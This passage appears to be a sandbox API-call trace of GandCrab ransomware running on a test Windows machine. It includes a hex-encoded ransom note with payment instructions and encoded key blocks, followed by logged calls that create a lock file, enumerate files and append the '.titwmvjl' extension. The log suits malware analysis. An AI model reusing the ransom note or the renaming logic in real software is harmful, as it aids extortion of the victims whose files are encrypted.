2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.769] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0069.770] CloseHandle (hObject=0x2cc) returned 1 [0069.770] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.771] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.771] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x5a)) [0069.771] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.771] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.771] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.772] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock") returned 101 [0069.772] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\assetcache\\nahqnpmn\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0069.772] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.772] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.772] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\") returned 77 [0069.772] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*" [0069.772] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5033f8 [0069.773] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.773] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.773] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.773] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.773] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.773] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.773] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.773] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock" [0069.773] lstrlenW (lpString=".titwmvjl") returned 9 [0069.773] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock") returned 101 [0069.773] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.773] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 110 [0069.773] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\d2ca4a09d2ca4deb61a.lock") returned 101 [0069.773] lstrlenW (lpString=".lock") returned 5 [0069.773] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.773] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.773] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.774] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.774] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.774] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.774] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.774] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt" [0069.774] lstrlenW (lpString=".titwmvjl") returned 9 [0069.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt") returned 97 [0069.774] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.774] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 106 [0069.774] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt") returned 97 [0069.774] lstrlenW (lpString=".txt") returned 4 [0069.774] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.774] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.774] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.774] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.775] lstrlenW 